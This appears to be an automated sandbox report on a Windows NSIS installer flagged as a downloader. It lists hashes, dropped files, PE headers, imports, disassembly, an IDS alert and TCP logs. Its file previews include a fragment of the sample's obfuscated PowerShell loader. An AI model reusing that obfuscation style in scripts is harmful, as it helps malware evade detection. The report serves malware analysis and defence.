SHA-512:	D7B54E3E42C8EC494C6FDB69A4C7FB4D1C2A86229F5BDE05EF17A97BA5134AD5A063080E9638FF2C44FB730A2C8ED42A34268F5C8C61C86E15E87D272C03C621
Malicious:	false
Preview:	$Radikandernes=$Signifikansniveauerneslindtarmsoperationer;.....<#Irradiates Inoculum Cacodaemon Endosperm Etiopisk Hoejreparenteser #>..<#saccharometres Abusious Dragers Ufredeligheds Gyngende Historial #>..<#Pseudoparallel Musicerendes Radikalisere Zygodont Smedesvenden #>..<#Svedkirtels Spinomuscular fuga Bygningattester Sculptitory Phthiriasis Nstmest #>..<#Uroliths Rkerivalen Epileptically Textilist transferrins #>..<#Wooziness cupeller Undoings Opretningernes Fordomsfries monsuners #>...$Fyrrekoglerne = @'.Uri ome. Normsy$AsherytRGravernt Fstemne Panuelbskdefral sebaroAccrescmJ.wliessTilsendtanom,idr Pindsve issekrtSknkeprsHematin=Superpl$TwirlieJ.seudoptP intert S,ilemeDaduchusAarsungtTresindu ekanise UndularEnkemannAfst esesekretisFemkmp ;wightaf.Embr onfSucceeduLucratin BaglygcUr nstitramseybiSor.imeoK mmerhnPuff.et OverfesA Hovedbs FunktikStraahaa fran,urSliwe ciAcumblesFlorsuk Phrasab(Indiane$BlendenFB vislirSapiostdIndsigtsNyisma.eBotan zlLocutorsBoulevalRacallaoSuccussv

C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\kyklopens.omk

Process:	C:\Users\user\Desktop\yMXFgPOdf2.exe
File Type:	data
Category:	dropped
Size (bytes):	123589
Entropy (8bit):	1.2483073164392806
Encrypted:	false
SSDEEP:	768:m1KHXfm5rQX+j8EqstsDz8z/nFdKur6NmZSqC+uioeefzpB:6KuTUst73XQTdFB
MD5:	C8E4A04215D6E7A2A46B2ECF556E8034
SHA1:	EC0CF162AFCCFC3EE67BEEF117DB801EAE87095A
SHA-256:	AB50D30AFE30A2B1E868A29CA803681B1A5C0182A1BA8A68E1F7F41C241CFAC2
SHA-512:	8FA144195FEDEB75D2E874AE4A35E667E366F805BE91D0AF79309FAEEA2857668FBFC4EC31F2CE85FF40BC197802F0E2EBEAF8C07AF12D4782A5B8A09792558E
Malicious:	false
Preview:	.....".............................................................................................................0...........2...............'..[.......[..............B....................'......'.q............2...............".............h..................&.................J...........................$@.....................W............................................h...........................................!...........k...................2..............%..............................................U....................(......................................................N.......................................=.........................}...................................W......T......................\|....................................................................................-..................................................................#....................................................................<...............'.................~........n........P...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.967733280499974
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	yMXFgPOdf2.exe
File size:	554'816 bytes
MD5:	54327a2f6c75bb2c549a5a98a462a588
SHA1:	f65473fa075bef32b55445d84cb8bfa4da48ac79
SHA256:	c3463021d3069ae7aad460707a950eb7b427a65c87f3d8e201b59cebb886a1b7
SHA512:	88595fa0af8ac0211145787ce0d0d3afdfb396edfcfcbab16d4714fbfb1077a8eb8df5ec6bd9aaefd916611363dd7791c62cfaba24a571bd4279ffb93bb73866
SSDEEP:	12288:aICfPgs7diA6gdZiygrNIVYAHHjMIyoS/B3FYA1YU:MZdL6AMxI+Aopz/lJv
TLSH:	A3C4231241A3D227D6B20B32257375438A55D13CB42A674A0BD4A52FFF1FB877A2B317
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.*j........PE..L....f.R.................b..........)2............@

File Icon


Icon Hash:	3d2e0f95332b3399

Static PE Info

General

Entrypoint:	0x403229
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x52BA66B8 [Wed Dec 25 05:01:44 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7ed0d71376e55d58ab36dc7d3ffda898

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+14h], ebp
mov dword ptr [esp+10h], 0040A2D8h
mov dword ptr [esp+1Ch], ebp
call dword ptr [00408034h]
push 00008001h
call dword ptr [00408134h]
push ebp
call dword ptr [004082ACh]
push 00000008h
mov dword ptr [00434F58h], eax
call 00007F9DD4B420D4h
mov dword ptr [00434EA4h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 0042B1B8h
call dword ptr [0040817Ch]
push 0040A2C0h
push 00433EA0h
call 00007F9DD4B41D3Fh
call dword ptr [00408138h]
mov ebx, 0043F000h
push eax
push ebx
call 00007F9DD4B41D2Dh
push ebp
call dword ptr [0040810Ch]
cmp word ptr [0043F000h], 0022h
mov dword ptr [00434EA0h], eax
mov eax, ebx
jne 00007F9DD4B3F23Ah
push 00000022h
mov eax, 0043F002h
pop esi
push esi
push eax
call 00007F9DD4B4177Eh
push eax
call dword ptr [00408240h]
mov dword ptr [esp+18h], eax
jmp 00007F9DD4B3F2FEh
push 00000020h
pop edx
cmp cx, dx
jne 00007F9DD4B3F239h
inc eax
inc eax
cmp word ptr [eax], dx
je 00007F9DD4B3F22Bh
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x85a0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4f000	0xe20	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x606c	0x6200	6b261bd7f45c2df7de2d0134c84421b7	False	0.6672114158163265	data	6.457067985385169	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1460	0x1600	0aa2dc336f7337ed3785ee2afeacae36	False	0.4211647727272727	data	4.945964880166059	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2af98	0x600	326f796323fdc724ea91090eafbe9bdc	False	0.4856770833333333	data	3.795352750027872	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x1a000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4f000	0xe20	0x1000	e5e5702e0860c5a23b57f4e4a3a48c73	False	0.39404296875	data	3.933821454129907	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4f208	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.42473118279569894
RT_DIALOG	0x4f4f0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x4f5f0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x4f710	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x4f7d8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x4f838	0x14	data	English	United States	1.2
RT_VERSION	0x4f850	0x2c8	data	English	United States	0.49297752808988765
RT_MANIFEST	0x4fb18	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, SetFileAttributesW, ExpandEnvironmentStringsW, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, SetErrorMode, GetCommandLineW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T04:27:01.146554+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.11	49980	142.250.184.238	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 04:27:00.073930979 CET	49980	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:00.073976994 CET	443	49980	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:00.074147940 CET	49980	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:00.096127033 CET	49980	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:00.096151114 CET	443	49980	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:00.760540962 CET	443	49980	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:00.760615110 CET	49980	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:00.761620998 CET	443	49980	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:00.761682987 CET	49980	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:00.826267004 CET	49980	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:00.826287985 CET	443	49980	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:00.826724052 CET	443	49980	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:00.826776028 CET	49980	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:00.830380917 CET	49980	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:00.871335983 CET	443	49980	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:01.146563053 CET	443	49980	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:01.146666050 CET	49980	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:01.146680117 CET	443	49980	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:01.146778107 CET	49980	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:01.146858931 CET	49980	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:01.146929026 CET	443	49980	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:01.146984100 CET	49980	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:01.173688889 CET	49981	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:01.173727036 CET	443	49981	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:01.173906088 CET	49981	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:01.174101114 CET	49981	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:01.174115896 CET	443	49981	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:01.823221922 CET	443	49981	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:01.823510885 CET	49981	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:01.928723097 CET	49981	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:01.928752899 CET	443	49981	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:01.929141045 CET	443	49981	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:01.929315090 CET	49981	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:01.930068016 CET	49981	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:01.971329927 CET	443	49981	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:02.272373915 CET	443	49981	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:02.272439957 CET	443	49981	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:02.272476912 CET	49981	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:02.272495031 CET	443	49981	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:02.272551060 CET	49981	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:02.272572994 CET	443	49981	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:02.272667885 CET	49981	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:02.300808907 CET	49981	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:02.300832987 CET	443	49981	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:02.453170061 CET	49982	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:02.453222990 CET	443	49982	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:02.453408957 CET	49982	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:02.453553915 CET	49982	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:02.453572989 CET	443	49982	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:03.082743883 CET	443	49982	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:03.082892895 CET	49982	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:03.083606005 CET	443	49982	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:03.083669901 CET	49982	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:03.085665941 CET	49982	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:03.085678101 CET	443	49982	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:03.085937023 CET	443	49982	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:03.086129904 CET	49982	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:03.086347103 CET	49982	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:03.131323099 CET	443	49982	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:03.462174892 CET	443	49982	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:03.462244987 CET	49982	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:03.462266922 CET	443	49982	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:03.462332964 CET	49982	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:03.462426901 CET	49982	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:03.462471962 CET	443	49982	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:03.462542057 CET	49982	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:03.474302053 CET	49983	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:03.474344969 CET	443	49983	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:03.474428892 CET	49983	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:03.474699020 CET	49983	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:03.474716902 CET	443	49983	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:04.106473923 CET	443	49983	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:04.106827974 CET	49983	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:04.121016979 CET	49983	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:04.121040106 CET	443	49983	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:04.121537924 CET	49983	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:04.121556997 CET	443	49983	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:04.535641909 CET	443	49983	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:04.535758018 CET	443	49983	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:04.535847902 CET	443	49983	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:04.536003113 CET	49983	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:04.601739883 CET	49983	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:04.601757050 CET	443	49983	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:04.859678030 CET	49984	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:04.859714031 CET	443	49984	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:04.859926939 CET	49984	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:04.860241890 CET	49984	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:04.860258102 CET	443	49984	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:05.496838093 CET	443	49984	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:05.497047901 CET	49984	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:05.497653961 CET	443	49984	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:05.497754097 CET	49984	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:05.499533892 CET	49984	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:05.499550104 CET	443	49984	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:05.499860048 CET	443	49984	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:05.499963999 CET	49984	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:05.500596046 CET	49984	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:05.543334961 CET	443	49984	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:05.880103111 CET	443	49984	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:05.880289078 CET	49984	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:05.880343914 CET	49984	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:05.880392075 CET	443	49984	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:05.880558968 CET	443	49984	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:05.880624056 CET	49984	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:05.880625010 CET	49984	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:05.887376070 CET	49985	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:05.887403965 CET	443	49985	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:05.887553930 CET	49985	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:05.887815952 CET	49985	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:05.887828112 CET	443	49985	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:06.534370899 CET	443	49985	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:06.535335064 CET	49985	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:06.535352945 CET	49985	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:06.535366058 CET	443	49985	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:06.535509109 CET	49985	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:06.535516024 CET	443	49985	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:06.979664087 CET	443	49985	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:06.979742050 CET	443	49985	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:06.979793072 CET	49985	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:06.979806900 CET	443	49985	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:06.979819059 CET	443	49985	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:06.979825974 CET	49985	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:06.979923964 CET	49985	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:06.980601072 CET	49985	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:06.980628967 CET	443	49985	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:07.151990891 CET	49986	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:07.152034998 CET	443	49986	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:07.152132034 CET	49986	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:07.152427912 CET	49986	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:07.152456999 CET	443	49986	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:07.804682016 CET	443	49986	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:07.805337906 CET	49986	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:07.805485964 CET	443	49986	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:07.805816889 CET	49986	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:07.808254957 CET	49986	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:07.808273077 CET	443	49986	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:07.808566093 CET	443	49986	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:07.808721066 CET	49986	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:07.809257030 CET	49986	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:07.851339102 CET	443	49986	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:08.200978041 CET	443	49986	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:08.201222897 CET	49986	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:08.201518059 CET	49986	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:08.201575041 CET	443	49986	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:08.201740026 CET	443	49986	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:08.201806068 CET	49986	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:08.201854944 CET	49986	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:08.222670078 CET	49987	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:08.222700119 CET	443	49987	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:08.222786903 CET	49987	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:08.223139048 CET	49987	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:08.223149061 CET	443	49987	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:08.855962992 CET	443	49987	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:08.856153011 CET	49987	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:08.856569052 CET	49987	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:08.856584072 CET	443	49987	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:08.856780052 CET	49987	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:08.856785059 CET	443	49987	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:09.320784092 CET	443	49987	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:09.320841074 CET	49987	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:09.320852041 CET	443	49987	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:09.320864916 CET	443	49987	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:09.320934057 CET	443	49987	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:09.320935965 CET	49987	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:09.321000099 CET	49987	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:09.322103024 CET	49987	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:09.322129011 CET	443	49987	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:09.438072920 CET	49988	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:09.438134909 CET	443	49988	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:09.438303947 CET	49988	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:09.438564062 CET	49988	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:09.438575983 CET	443	49988	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:10.066584110 CET	443	49988	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:10.066781998 CET	49988	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:10.067404985 CET	443	49988	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:10.067468882 CET	49988	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:10.070545912 CET	49988	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:10.070553064 CET	443	49988	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:10.070782900 CET	443	49988	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:10.070854902 CET	49988	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:10.071218967 CET	49988	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:10.111329079 CET	443	49988	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:10.454371929 CET	443	49988	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:10.454456091 CET	49988	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:10.454469919 CET	443	49988	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:10.454586983 CET	49988	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:10.454586983 CET	49988	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:10.454612970 CET	443	49988	142.250.184.238	192.168.2.11
Jan 11, 2025 04:27:10.454765081 CET	49988	443	192.168.2.11	142.250.184.238
Jan 11, 2025 04:27:10.464888096 CET	49989	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:10.464919090 CET	443	49989	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:10.465009928 CET	49989	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:10.465289116 CET	49989	443	192.168.2.11	142.250.185.161
Jan 11, 2025 04:27:10.465300083 CET	443	49989	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:11.115966082 CET	443	49989	142.250.185.161	192.168.2.11
Jan 11, 2025 04:27:11.116048098 CET	49989	443	192.168.2.11	142.250.185.161
